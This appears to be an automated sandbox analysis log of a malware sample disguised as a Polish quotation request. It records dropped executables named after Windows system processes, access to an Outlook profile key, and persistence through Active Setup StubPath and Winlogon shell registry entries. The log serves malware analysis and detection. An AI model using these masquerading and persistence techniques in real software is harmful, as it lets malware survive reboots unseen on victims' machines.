                    Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeStatic file information: File size 1524650 > 1048576
                    Source: Binary string: wntdll.pdbUGP source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000003.2051235689.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000003.2047915436.0000000004540000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000003.2051235689.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, zapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000003.2047915436.0000000004540000.00000004.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\System\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B196B287-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32Jump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0040EB70 LoadLibraryA,GetProcAddress,1_2_0040EB70
                    Source: explorer.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x4ef72
                    Source: zapytanie ofertowe st-2024-s315 cpa9170385.exe .0.drStatic PE information: real checksum: 0xa2135 should be: 0x134544
                    Source: stsys.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x54679
                    Source: icsys.icn.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x4de18
                    Source: spoolsv.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x53684
                    Source: svchost.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x45b32
                    Source: mrsys.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x491b8
                    Source: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeStatic PE information: real checksum: 0x0 should be: 0x1750c9
                    Source: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeStatic PE information: section name: .tdata
                    Source: icsys.icn.exe.0.drStatic PE information: section name: .tdata
                    Source: explorer.exe.2.drStatic PE information: section name: .tdata
                    Source: spoolsv.exe.4.drStatic PE information: section name: .tdata
                    Source: mrsys.exe.4.drStatic PE information: section name: .tdata
                    Source: svchost.exe.5.drStatic PE information: section name: .tdata
                    Source: stsys.exe.6.drStatic PE information: section name: .tdata
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004171D1 push ecx; ret 1_2_004171E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05294928 push eax; ret 10_2_05294912
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05294928 push eax; ret 10_2_05294922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05294968 push eax; ret 10_2_05294972
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05294978 push eax; ret 10_2_05294982
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05294958 push eax; ret 10_2_05294962
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05294988 push eax; ret 10_2_05294992
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_052948F8 push eax; ret 10_2_05294912
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_05294A2D push eax; ret 10_2_05294962

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\System\spoolsv.exeFile created: C:\Windows\System\svchost.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeFile created: C:\Windows\System\explorer.exeJump to dropped file
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\System\spoolsv.exeJump to dropped file
                    Source: C:\Windows\System\svchost.exeExecutable created and started: c:\windows\system\spoolsv.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeExecutable created and started: c:\windows\system\explorer.exeJump to behavior
                    Source: C:\Windows\System\spoolsv.exeExecutable created and started: c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe File created: \zapytanie ofertowe st-2024-s315 cpa9170385.exe
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe File created: \zapytanie ofertowe st-2024-s315 cpa9170385.exe Jump to behavior
                    Source: C:\Windows\System\spoolsv.exeFile created: C:\Windows\System\svchost.exeJump to dropped file
                    Source: C:\Windows\System\explorer.exeFile created: C:\Users\user\AppData\Roaming\mrsys.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeFile created: C:\Windows\System\explorer.exeJump to dropped file
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\System\spoolsv.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeFile created: C:\Users\user\AppData\Local\icsys.icn.exeJump to dropped file
                    Source: C:\Windows\System\svchost.exeFile created: C:\Users\user\AppData\Local\stsys.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeFile created: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Jump to dropped file
                    Source: C:\Windows\System\spoolsv.exeFile created: C:\Windows\System\svchost.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeFile created: C:\Windows\System\explorer.exeJump to dropped file
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\System\spoolsv.exeJump to dropped file
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeFile created: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Jump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Windows\System\explorer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\explorer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\explorer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon shellJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
